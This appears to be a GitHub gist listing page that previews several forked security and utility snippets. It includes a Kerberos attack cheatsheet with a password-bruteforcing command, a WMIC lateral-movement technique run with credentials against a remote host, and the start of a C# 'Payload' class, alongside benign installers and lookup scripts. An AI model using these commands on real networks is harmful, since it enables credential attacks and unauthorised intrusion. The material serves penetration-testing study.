Skip to content

Instantly share code, notes, and snippets.

@reanimat0r
reanimat0r / server.c
Created June 19, 2020 20:31 — forked from chaztaz11/server.c
File
/*
███╗ ███╗ ██████╗ ██████╗ ███████╗
████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝
██╔████╔██║██║ ██║██║ ██║ ███╔╝
██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝
██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝
If you have this you are trusted. Please do not leak!
MODZ SERVER SIDE V1 By DaddyL33T
# /------------------------------------------\
# | don't forget to download the .tp file |
# | and place it in the user's directory :› |
# | |
# | also install lolcat: |
# | https://github.com/busyloop/lolcat |
# \------------------------------------------/
alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;'
@reanimat0r
reanimat0r / 0_opencti_ubuntu_installer.sh
Created May 17, 2020 17:08 — forked from p-rs/0_ubuntu_opencti_installer.sh
Automates install OpenCTI based on manual deployment: https://opencti-platform.github.io/docs/installation/manual - Tested successfully on Ubuntu 18.04
#! /bin/bash -e
# script: opencti_ubuntu_installer.sh
# purpose: to automate install opencti based on manual deployment below
# process: https://opencti-platform.github.io/docs/installation/manual
# license: Apache 2.0
# check root -------------------------------------------------------
@reanimat0r
reanimat0r / geoip2lookup.bash
Created May 10, 2020 09:51 — forked from bmatthewshea/geoip2lookup.bash
BASH GeoIP Lookup script for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
@reanimat0r
reanimat0r / AbirDomains.py
Created April 23, 2020 21:21 — forked from ChananelCode/AbirDomains.py
Small very light-weight Subdomains checker .
# This code was written by Chananel Gerstensang.Contact: [email protected],
# Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157
# Github: https://github.com/ChananelCode
# Enjoy!
import requests
counter_Domains = 0
Domains_List = open("./DomainsList.txt", "r").read().split()
@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / wmicLateralMovement.txt
Created April 8, 2020 21:12 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@reanimat0r
reanimat0r / whatsapp_sendMSG.js
Created April 1, 2020 03:05 — forked from yask123/whatsapp_sendMSG.js
Send messages on whatsapp by Javascript
document.getElementsByClassName("input")[1].innerHTML="This message was written via JS script! "; // Fills the text box message
var input = document.getElementsByClassName("icon btn-icon icon-send");//Grabs the send button
input[0].click();// Clicks the send button